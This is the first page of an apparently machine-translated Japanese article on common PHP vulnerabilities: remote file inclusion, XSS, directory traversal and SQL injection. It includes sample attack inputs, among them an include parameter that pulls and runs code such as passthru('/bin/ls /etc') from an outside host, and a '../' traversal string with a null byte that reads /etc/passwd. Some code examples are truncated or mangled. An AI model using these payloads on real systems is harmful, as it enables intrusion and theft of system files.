ホームページ >php教程 >php手册 >PHPページの脆弱性分析と関連する問題解決

PHPページの脆弱性分析と関連する問題解決

WBOY
WBOYオリジナル
2016-06-21 08:54:45994ブラウズ

現在のネットワーク セキュリティから判断すると、誰もが最も懸念し、最も危険にさらされているのは ASP であるはずです。この点に関しては、Xiaozhu が専門家であり、私には何も言えません。ただし、PHP に関してはセキュリティ上の問題も深刻ですが、この分野の記事はあまりありません。ここでは、PHP ページの関連する脆弱性について簡単に説明します。

現在一般的な PHP の脆弱性をまとめました。ファイルの脆弱性、スクリプトコマンド実行の脆弱性、ファイルリークの脆弱性、SQL インジェクションの脆弱性などに大別されます。もちろん、COOKIE スプーフィングなどの一般的なテクノロジーについては、ここでは説明しません。これに関する情報はオンラインにたくさんあります。それでは、これらの脆弱性を悪用する方法を 1 つずつ分析してみましょう

まず、インクルード ファイルの脆弱性について説明します。この脆弱性は PHP に特有のものと言えます。これは、外部から提供された悪意のあるデータの処理が不十分であることが原因であり、リモートの攻撃者がこれらの脆弱性を悪用して、WEB プロセス権限を使用してシステム上で任意のコマンドを実行することができます。例を見てみましょう: a.php に次のようなコードがあるとします:

以下は引用です:

include($include."/xxx.php");

?>

このコードでは、$include は通常は設定されているパスですが、自分でパスを構築することで攻撃の目的を達成することができます。たとえば、a.php?include=http://web/b.php を送信すると、この Web が攻撃に使用されるスペースになります。もちろん、b.php は攻撃に使用されるコードです。 b.php には passthru("/bin/ls /etc"); のようなコードを記述できます。このようにして、一部の標的型攻撃が実行される可能性があります。 (注: Web サーバーは PHP コードを実行できてはなりません。実行できないと問題が発生します。関連する詳細については、<>を参照してください。)この脆弱性に関しては、PayPal Store Front、HotNews、Mambo Open Source、PhpDig、YABB SE、phpBB、InvisionBoard、SOLMETRA SPAW Editor、Les Visiteurs、PhpGedView、X-Cart など、多くの問題が存在します。

次に、スクリプトコマンド実行の脆弱性を見てみましょう。これは、ユーザーが送信した URI パラメータのフィルタリングが不十分であるため、悪意のある HTML コードを含むデータを送信すると、クロスサイト スクリプティング攻撃が引き起こされ、ターゲット ユーザーの機密情報が取得される可能性があります。また、例を挙げてみましょう。PHP Transparent PHP 4.3.1 以前では、PHPSESSID の十分なフィルタリングが欠如しており、http://web/index= というコードを通じて攻撃の目的を達成できます。 ">スクリプトでは、ユーザーの機密情報を取得する関数を構築できます。この点に関する脆弱性は比較的少ないです。PHP Transparent に加えて、PHP-Nuke、phpBB、PHP Classifieds、PHPix、Ultimate があります。 PHP ボードなど

次に、ファイル漏洩の脆弱性を見てみましょう。この脆弱性は、ユーザーが送信したパラメータのフィルタリングが不十分であることが原因で、これを利用してディレクトリ トラバーサル攻撃を実行し、機密情報を取得する可能性があります。最近発見された phpMyAdmin を例に挙げてみましょう。 phpMyAdmin では、export.php ページは、ユーザーが送信した「what」パラメータを完全にフィルタリングしません。複数の「../」文字を含むデータを送信することにより、リモート攻撃者は WEB ROOT 制限を回避し、WEB 権限でシステムを表示することができます。に関するあらゆるファイル情報。たとえば、export.php?what=../../../../../../etc/passwd%00 というアドレスを入力すると、ファイル漏洩の目的を達成できます。この分野には、myPHPNuke、McNews など、比較的多くのサービスがあります。

ついに、最もエキサイティングな場所に戻りました。 ASP ページで SQL インジェクションを使用することがどれほど楽しいかを考えてみてください。以前は、Xiaozhu が「SQL インジェクションの秘密の本」を見つけて (笑)、NBSI を開発するまでは、SQL インジェクションを手動で挿入する必要がありました。素晴らしい空の一部。彼は、CSDN、モノポリー フォーラム、チャイナ チャンネルなどの大規模な Web サイトの抜け穴を見つけるのに貢献してきました。 (これらのナンセンスについては、少し話が逸れるため、これ以上は言いません...)。

1 2 3 4 次のページ > 全文を読む

ヒント: ページをより便利にめくるには、「← →」キーをお試しください。



声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。